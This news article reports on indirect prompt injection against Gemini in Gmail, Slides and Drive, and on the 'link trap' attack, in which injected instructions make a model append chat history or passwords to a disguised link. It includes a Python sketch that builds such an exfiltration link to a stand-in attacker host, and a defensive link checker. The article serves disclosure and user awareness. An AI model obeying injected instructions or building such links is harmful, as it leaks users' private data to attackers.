Gmail Security Flaw Confirmed, But Google Won't Fix It: Here's Why
Update, Jan. 3, 2025: This story, originally published Jan. 2, now includes details of another under-the-radar prompt injection attack known as the link trap, in addition to the indirect prompt injection threat facing Gmail users.
Gmail users love the convenient features that make the world's biggest email service, with an astonishing 2.5 billion accounts, so easy to use. The integration of Gemini AI across Workspace, covering a multitude of Google products, has elevated the email experience further still. So, when security researchers disclosed vulnerabilities and demonstrated how attacks could play out across Gmail, Google Slides, and Google Drive, you might wonder why Google decided this was not a security issue and closed the ticket as "Won't Fix (Intended Behavior)." Having looked into the matter, I've uncovered some facts you'll want to know.
The Gemini AI Security Flaw Explained
Throughout 2024 we saw plenty of headlines about AI-driven attacks against Gmail users, from the widely shared account of a security expert who narrowly avoided becoming another hacking victim, to Google's own security alerts being turned against its users, and, as the year drew to a close, a warning from Google itself about a second wave of attacks targeting Gmail users. The story that stood out, however, was a technical security analysis that left me asking why an issue with potentially serious security consequences wasn't being fixed: "Gemini is vulnerable to indirect prompt injection attacks," the report stated, describing how these attacks "can occur across platforms like Gmail, Google Slides, and Google Drive, enabling phishing attempts and manipulating the chatbot's behavior."
Security researchers Jason Martin and Kenneth Yeung shared their findings as part of the responsible disclosure process. "This and other prompt injections in this blog were reported to Google, who decided not to track it as a security issue and marked the ticket as a Won't Fix (Intended Behavior)," they stated.
Some users recommended disabling Gmail's smart features, while others wondered how they could opt out of AI reading their private email messages. So I dug deeper and consulted my Google contacts.
In Plain English: The Gemini AI Prompt Injection Issue
If you have the time, I'd recommend reading the HiddenLayer Gemini AI security analysis in full. For everyone else, I've distilled the security issue into the most succinct summary I can.
Like most advanced language models, Google's Gemini AI is susceptible to indirect prompt injection attacks. "Under specific circumstances," the report explained, "users can manipulate the assistant to produce misleading or unwanted responses." The misleading part might sound unremarkable, but the indirect aspect is crucial: it allows third parties to take control of a language model by embedding the injected prompt in "less apparent channels" such as documents, emails, or websites.
Given that attackers can send malicious documents and emails to target accounts, compromising the integrity of the responses generated by the affected Gemini instance, things start to look rather more serious.
"By providing detailed proof-of-concept examples," the researchers demonstrated, "we were able to illustrate how these attacks can occur across platforms like Gmail, Google Slides, and Google Drive." Particularly, the report discussed phishing via Gemini in Gmail, tampering with data in Google Slides, and polluting Google Drive locally and with shared documents. "These examples demonstrate that outputs from the Gemini for Workspace suite can be compromised," the researchers concluded, spelling out some serious concerns regarding the integrity of these products.
The Link Trap Attack Revealed By Security Researchers
Jay Liao, a senior staff engineer at Trend Micro, recently shed light on another prompt injection attack that LLM users need to be aware of: the link trap.
What makes the link trap prompt injection attack so serious is that, under certain circumstances, it can compromise sensitive data belonging to the user or their organization even when the AI has no external connectivity at all. The methodology is surprisingly straightforward given the complexity of the underlying technology.
Liao gives the example of a hypothetical user asking the AI about airports in Japan ahead of an upcoming trip. The prompt injection in this scenario, however, includes malicious instructions to return a clickable link of the attacker's choosing. When the user clicks that link, they unwittingly complete the attack and expose sensitive data.
Liao explained how, in an attack on a public generative AI service, the injected prompt might focus on "collecting the user's chat history, such as personal information, travel plans, or schedules." For private instances, by contrast, it could target "internal passwords or confidential internal documents provided by the company to the AI." The second stage supplies the link itself, instructing the AI to append the sensitive data to it while hiding the actual URL behind a generic-looking link so as not to arouse suspicion. "Once the user clicks the link," Liao explained, "the information is sent to a remote attacker."
In the example above, the initial response could still provide genuinely useful information about Japan, so nothing appears amiss.
The link it contains, however, can carry the sensitive data, and to entice the user to click, it may be disguised behind an innocuous label such as "reference" or other reassuring wording.
In a typical prompt injection attack, the attacker needs the user's permissions to do real damage, such as sending emails or modifying databases, and limiting those permissions is one way to contain the impact of such attacks. The link trap, as Liao explained, breaks that assumption: "Even when we don't permit the AI to interact further with the external world and only permit it to execute basic tasks like addressing received information and queries, sensitive information can still be disclosed." That's because the victim, the user, inherently has more permissions than the AI, according to Liao.
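To illustrate why a single click is enough, here is a hypothetical sketch of the kind of link an injected instruction asks the model to construct; the attacker domain, label, and helper names are my own inventions, not Trend Micro's. The sensitive material is URL-encoded into a query string and hidden behind a friendly label, so the exfiltration is performed by the user's own browser, with the user's own permissions, the moment the link is opened; the AI itself never needs network access.

```python
from urllib.parse import quote

# Hypothetical end product of a link-trap injection: the model is told to fold
# whatever sensitive context it has seen into the query string of an
# attacker-controlled URL. Domain and data below are made up for illustration.

ATTACKER_ENDPOINT = "https://collector.example.net/log"

def build_exfiltration_link(stolen_context: str, label: str = "reference") -> str:
    """Builds a markdown link that looks harmless but carries stolen data."""
    payload = quote(stolen_context)  # URL-encode the sensitive text
    return f"[{label}]({ATTACKER_ENDPOINT}?q={payload})"

if __name__ == "__main__":
    chat_history = "Name: Alex Doe; travelling to Tokyo 12-18 March; passport on file"
    # The rendered chat shows only the word 'reference'; the query string does the rest.
    print(build_exfiltration_link(chat_history))
```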
In response to concerns about Gmail prompt injection attacks, I reached out to my Gmail contacts, and a Google spokesperson provided the following statement:
"We've consistently prioritized defending against attacks like this, and we've implemented numerous robust measures to safeguard users, such as security checks to resist prompt injection attacks and misleading responses. We continuously strengthen our defenses through red-team exercises that train our models to counteract these types of attacks."
A more in-depth conversation with my Gmail contacts revealed the following points, which all Gmail users should bear in mind regarding security and Google's AI capabilities:
- These vulnerabilities are not new and affect LLMs across the industry.
- When launching any new LLM-based project, Google carries out internal and external security testing to meet user requirements as well as its own safety criteria.
- Security testing includes evaluations from the Google AI Red Team on prompt attacks, training data extraction, backdooring the model, adversarial examples, data poisoning, and exfiltration.
- Google also integrates AI into its Vulnerability Rewards Program, which has specific guidelines for AI bug reports to help enhance the community's capacity to test the safety and security of Google AI products.
- Furthermore, Gmail and Drive incorporate robust spam filters and user input validation, which help to guard against the hostile injection of malicious code into Gemini.
- Despite the integration of Gemini AI into Gmail and other Google products, security researchers have highlighted a vulnerability that leaves these platforms susceptible to indirect prompt injection attacks, enabling phishing attempts and manipulation of the chatbot's behavior.
- Google classified this Gemini AI security issue as "Won't Fix (Intended Behavior)" in a ticket, leading some users to question Google's view on the matter.
- In response to concerns about Gmail prompt injection attacks, a Google spokesperson confirmed that the company has prioritized defending against such attacks and has implemented numerous security measures to safeguard users, including checks designed to resist prompt injection attacks and misleading responses.
- While the Gemini AI vulnerability is not unique to Gmail, users can take precautions to enhance their security, such as disabling certain smart features and staying vigilant against phishing attempts, especially those involving links or clickable content, as the sketch below illustrates.
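As a purely illustrative example of that kind of vigilance, the following sketch shows one simplified way to vet links in AI-generated output before trusting them. The allow-list, regular expression, and function name are my own assumptions; this is not how Gmail or Gemini actually filter content, just the flavor of check that blunts link-trap style exfiltration.

```python
import re
from urllib.parse import urlparse

# Simplified, hypothetical link vetting for AI-generated output. Not Google's
# implementation; just an illustration of the kind of precaution that helps
# against link-trap style data exfiltration.

TRUSTED_DOMAINS = {"google.com", "support.google.com"}  # example allow-list

MARKDOWN_LINK = re.compile(r"\[([^\]]+)\]\((https?://[^)]+)\)")

def flag_suspicious_links(ai_output: str) -> list[str]:
    """Returns warnings for links on unknown domains or carrying query-string data."""
    warnings = []
    for label, url in MARKDOWN_LINK.findall(ai_output):
        parsed = urlparse(url)
        host = parsed.hostname or ""
        if host not in TRUSTED_DOMAINS:
            warnings.append(f"Untrusted domain behind '{label}': {host}")
        if parsed.query:
            warnings.append(f"Link labelled '{label}' carries data in its query string")
    return warnings

if __name__ == "__main__":
    sample = "Here is a [reference](https://collector.example.net/log?q=Name%3A%20Alex)."
    for warning in flag_suspicious_links(sample):
        print("WARNING:", warning)
```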